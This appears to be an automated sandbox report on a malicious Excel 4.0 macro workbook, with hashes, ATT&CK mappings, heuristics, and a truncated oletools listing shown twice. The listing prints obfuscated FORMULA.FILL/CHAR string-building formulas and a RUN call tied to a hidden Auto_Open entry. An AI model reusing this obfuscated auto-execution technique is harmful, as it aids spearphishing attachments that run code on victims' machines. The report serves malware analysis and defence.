Office (OLE) malware analysis — malicious · 63db59695cb53707

MALICIOUS

Office (OLE)

173.5 KB Created: 2020-05-12 12:44:12 Authoring application: Microsoft Excel First seen: 2020-06-01

MD5: ef4cbd749f8b454c1865a225bacb81a9 SHA-1: 5fb463b6a87003b21ca6a800ba3e9c75618c1857 SHA-256: 63db59695cb53707077570dd4aca3493f0a2e6ba2a857545728ea96d04eba71f

140 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The file is an Excel 4.0 macro-enabled workbook containing an Auto_Open macro. This macro uses dangerous functions like RUN and FORMULA.FILL, indicating it's designed to execute arbitrary commands or download and run a second-stage payload. The presence of an Auto_Open entry strongly suggests this file is intended to be delivered as a spearphishing attachment.

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 126234 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	126234 bytes
SHA-256: `34b3fe9069238f5bba31a197cbf0de885a8f4a7c23a1767f46c9ab82d4256edd`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!JT13542 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,JN38,"",-0.82442748091603057503 ' Sheet,JT42,"",4.76973684210526283067 ' Sheet,EA50,"",0.13585746102449888784 ' Sheet,EX70,"FORMULA.FILL(CHAR(BV56517-CJ21329)&CHAR(IU47857-BV26053)&CHAR(EE54942+GQ36575)&CHAR(CQ21132FY49595)&CHAR(EE54942+GD21148)&CHAR(IU47857+IF44988)&CHAR(BR31442/JC48877)&CHAR(HB25394CD50949)&CHAR(BR31442/I46551)&CHAR(HF31997-FD17399)&CHAR(EG29296GA21881)&CHAR(BA4036+HT44963)&CHAR(HF31997+A60143)&CHAR(EG29296JC53254)&CHAR(CQ21132/FD53622)&CHAR(HB25394DS45112)&CHAR(EG29296-N4053)&CHAR(BA4036+HE669)&CHAR(EE54942/FJ57338)&CHAR(BA4036/GT39206)&CHAR(HF31997+CW45553)&CHAR(HF31997/ED33021)&CHAR(IU47857-GG53804)&CHAR(EE54942-HO52163)&CHAR(EE54942-JD38146)&CHAR(IU47857/JK25668)&CHAR(HB25394-F45109)&CHAR(HB25394BZ29136)&CHAR(FY45020/DE48189)&CHAR(EE54942/HY10466)&CHAR(CQ21132DD7308)&CHAR(BR31442-BD42072)&CHAR(HB25394DC6647)&CHAR(HF31997-IN43988)&CHAR(EG29296+CP58717)&CHAR(CQ21132/EF11945)&CHAR(EG29296ET57672)&CHAR(BV56517-IY21719)&CHAR(HB25394CL32698)&CHAR(BA4036HN44768)&CHAR(BA4036GM7370)&CHAR(EE54942+GS38503)&CHAR(FY45020JF34184)&CHAR(EE54942-CW23724)&CHAR(HB25394/E38634)&CHAR(HF31997-FJ59645)&CHAR(IU47857/FL12118),EX71)","" ' Sheet,EX72,RUN(FA28292),"" ' Sheet,FQ76,"",382.00000000000000000000 ' Sheet,GZ313,"",-456.00000000000000000000 ' Sheet,HN497,"",-0.31818181818181817677 ' Sheet,EA654,"",-419.00000000000000000000 ' Sheet,CS656,"",-262.00000000000000000000 ' Sheet,HE669,"",186.00000000000000000000 ' Sheet,IH679,"",197.00000000000000000000 ' Sheet,ID704,"",7.09090909090909082835 ' Sheet,CU722,"",-7.95454545454545414174 ' Sheet,DM728,"",0.23426573426573427117 ' Sheet,HI797,"",-0.18072289156626505924 ' Sheet,EQ828,"",-0.22857142857142856429 ' Sheet,CA843,"",14.85294117647058875775 ' Sheet,BI850,"",-529.00000000000000000000 ' Sheet,HK899,"",-272.00000000000000000000 ' Sheet,GI901,"",-476.00000000000000000000 ' Sheet,GE907,"",-292.00000000000000000000 ' Sheet,EU985,"",3.80808080808080795521 ' Sheet,CX1079,"",-1.65671641791044765846 ' Sheet,EZ1080,"",0.15384615384615385469 ' Sheet,CF1084,"",-442.75000000000000000000 ' Sheet,ES1103,"",-430.00000000000000000000 ' Sheet,GP1110,"",326.00000000000000000000 ' Sheet,BQ1162,"",-0.10549450549450549441 ' Sheet,HQ1204,"",-261.00000000000000000000 ' Sheet,EJ1238,"",-190.00000000000000000000 ' Sheet,EY1264,"",-388.00000000000000000000 ' Sheet,JA1322,"",-0.12747352747252746474 ' Sheet,II1323,"FORMULA.FILL(CHAR(FS42066CC29312)&CHAR(X60865/HN19206)&CHAR(FS42066+FW30739)&CHAR(GC39473+EX11033)&CHAR(HT1140+FK13420)&CHAR(F12282-JU38051)&CHAR(F12282+JU2299)&CHAR(X60865FN61197)&CHAR(FS42066+FB52615)&CHAR(IN22251JN38)&CHAR(DA65315/HC12428)&CHAR(GC39473CS8105)&CHAR(IN22251BM23903)&CHAR(BL42083-FM24860)&CHAR(X60865+FA16970)&CHAR(GC39473+GA14794)&CHAR(FS42066-I58068)&CHAR(IN22251GC49076)&CHAR(BL42083-FA7149)&CHAR(BL42083+EU55403)&CHAR(GX33314+EP31216)&CHAR(BL42083+JP2900)&CHAR(DA65315/U38967)&CHAR(GX33314-CD52266)&CHAR(GC39473GL23327)&CHAR(HT1140/GQ5796)&CHAR(EJ65241FR43853)&CHAR(F12282BD37005)&CHAR(F12282/EI44069)&CHAR(IN22251/D14637)&CHAR(DA65315/FC29956)&CHAR(BL42083IW24696)&CHAR(EJ65241CC44278)&CHAR(FS42066-GE5576)&CHAR(FS42066/W17860)&CHAR(GC39473*DW17387)&CHAR(F12282+F13870)&CHAR(GC39473+BS39205)&CHAR(F12282/IY22907)&CHAR(X60865/DQ45315)&CHAR(FS42066-DQ44214)&CHAR(EJ65241+DI33301)&CHAR(BL42083-JP12447)&CHAR(DA65315/EB22957)&CHAR(HT1140/FS34100)&CHAR(F12282/CW24192)&CHAR(EJ65241+DZ7845)&CHAR(EJ65241/C9016)&CHAR(F12282/IL60694)&CHAR(X60865+G48903)&CHAR(F12282/JQ48190)&CHAR(GC39473/EA65155)&CHAR(GX33314-HM30499)&CHAR(DA65315/T7910)&CHAR(HT11 ... (truncated)

SHA-256: 34b3fe9069238f5bba31a197cbf0de885a8f4a7c23a1767f46c9ab82d4256edd

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!JT13542 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,JN38,"",-0.82442748091603057503
'  Sheet,JT42,"",4.76973684210526283067
'  Sheet,EA50,"",0.13585746102449888784
'  Sheet,EX70,"FORMULA.FILL(CHAR(BV56517-CJ21329)&CHAR(IU47857-BV26053)&CHAR(EE54942+GQ36575)&CHAR(CQ21132*FY49595)&CHAR(EE54942+GD21148)&CHAR(IU47857+IF44988)&CHAR(BR31442/JC48877)&CHAR(HB25394*CD50949)&CHAR(BR31442/I46551)&CHAR(HF31997-FD17399)&CHAR(EG29296*GA21881)&CHAR(BA4036+HT44963)&CHAR(HF31997+A60143)&CHAR(EG29296*JC53254)&CHAR(CQ21132/FD53622)&CHAR(HB25394*DS45112)&CHAR(EG29296-N4053)&CHAR(BA4036+HE669)&CHAR(EE54942/FJ57338)&CHAR(BA4036/GT39206)&CHAR(HF31997+CW45553)&CHAR(HF31997/ED33021)&CHAR(IU47857-GG53804)&CHAR(EE54942-HO52163)&CHAR(EE54942-JD38146)&CHAR(IU47857/JK25668)&CHAR(HB25394-F45109)&CHAR(HB25394*BZ29136)&CHAR(FY45020/DE48189)&CHAR(EE54942/HY10466)&CHAR(CQ21132*DD7308)&CHAR(BR31442-BD42072)&CHAR(HB25394*DC6647)&CHAR(HF31997-IN43988)&CHAR(EG29296+CP58717)&CHAR(CQ21132/EF11945)&CHAR(EG29296*ET57672)&CHAR(BV56517-IY21719)&CHAR(HB25394*CL32698)&CHAR(BA4036*HN44768)&CHAR(BA4036*GM7370)&CHAR(EE54942+GS38503)&CHAR(FY45020*JF34184)&CHAR(EE54942-CW23724)&CHAR(HB25394/E38634)&CHAR(HF31997-FJ59645)&CHAR(IU47857/FL12118),EX71)",""
'  Sheet,EX72,RUN(FA28292),""
'  Sheet,FQ76,"",382.00000000000000000000
'  Sheet,GZ313,"",-456.00000000000000000000
'  Sheet,HN497,"",-0.31818181818181817677
'  Sheet,EA654,"",-419.00000000000000000000
'  Sheet,CS656,"",-262.00000000000000000000
'  Sheet,HE669,"",186.00000000000000000000
'  Sheet,IH679,"",197.00000000000000000000
'  Sheet,ID704,"",7.09090909090909082835
'  Sheet,CU722,"",-7.95454545454545414174
'  Sheet,DM728,"",0.23426573426573427117
'  Sheet,HI797,"",-0.18072289156626505924
'  Sheet,EQ828,"",-0.22857142857142856429
'  Sheet,CA843,"",14.85294117647058875775
'  Sheet,BI850,"",-529.00000000000000000000
'  Sheet,HK899,"",-272.00000000000000000000
'  Sheet,GI901,"",-476.00000000000000000000
'  Sheet,GE907,"",-292.00000000000000000000
'  Sheet,EU985,"",3.80808080808080795521
'  Sheet,CX1079,"",-1.65671641791044765846
'  Sheet,EZ1080,"",0.15384615384615385469
'  Sheet,CF1084,"",-442.75000000000000000000
'  Sheet,ES1103,"",-430.00000000000000000000
'  Sheet,GP1110,"",326.00000000000000000000
'  Sheet,BQ1162,"",-0.10549450549450549441
'  Sheet,HQ1204,"",-261.00000000000000000000
'  Sheet,EJ1238,"",-190.00000000000000000000
'  Sheet,EY1264,"",-388.00000000000000000000
'  Sheet,JA1322,"",-0.12747352747252746474
'  Sheet,II1323,"FORMULA.FILL(CHAR(FS42066*CC29312)&CHAR(X60865/HN19206)&CHAR(FS42066+FW30739)&CHAR(GC39473+EX11033)&CHAR(HT1140+FK13420)&CHAR(F12282-JU38051)&CHAR(F12282+JU2299)&CHAR(X60865*FN61197)&CHAR(FS42066+FB52615)&CHAR(IN22251*JN38)&CHAR(DA65315/HC12428)&CHAR(GC39473*CS8105)&CHAR(IN22251*BM23903)&CHAR(BL42083-FM24860)&CHAR(X60865+FA16970)&CHAR(GC39473+GA14794)&CHAR(FS42066-I58068)&CHAR(IN22251*GC49076)&CHAR(BL42083-FA7149)&CHAR(BL42083+EU55403)&CHAR(GX33314+EP31216)&CHAR(BL42083+JP2900)&CHAR(DA65315/U38967)&CHAR(GX33314-CD52266)&CHAR(GC39473*GL23327)&CHAR(HT1140/GQ5796)&CHAR(EJ65241*FR43853)&CHAR(F12282*BD37005)&CHAR(F12282/EI44069)&CHAR(IN22251/D14637)&CHAR(DA65315/FC29956)&CHAR(BL42083*IW24696)&CHAR(EJ65241*CC44278)&CHAR(FS42066-GE5576)&CHAR(FS42066/W17860)&CHAR(GC39473*DW17387)&CHAR(F12282+F13870)&CHAR(GC39473+BS39205)&CHAR(F12282/IY22907)&CHAR(X60865/DQ45315)&CHAR(FS42066-DQ44214)&CHAR(EJ65241+DI33301)&CHAR(BL42083-JP12447)&CHAR(DA65315/EB22957)&CHAR(HT1140/FS34100)&CHAR(F12282/CW24192)&CHAR(EJ65241+DZ7845)&CHAR(EJ65241/C9016)&CHAR(F12282/IL60694)&CHAR(X60865+G48903)&CHAR(F12282/JQ48190)&CHAR(GC39473/EA65155)&CHAR(GX33314-HM30499)&CHAR(DA65315/T7910)&CHAR(HT11
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.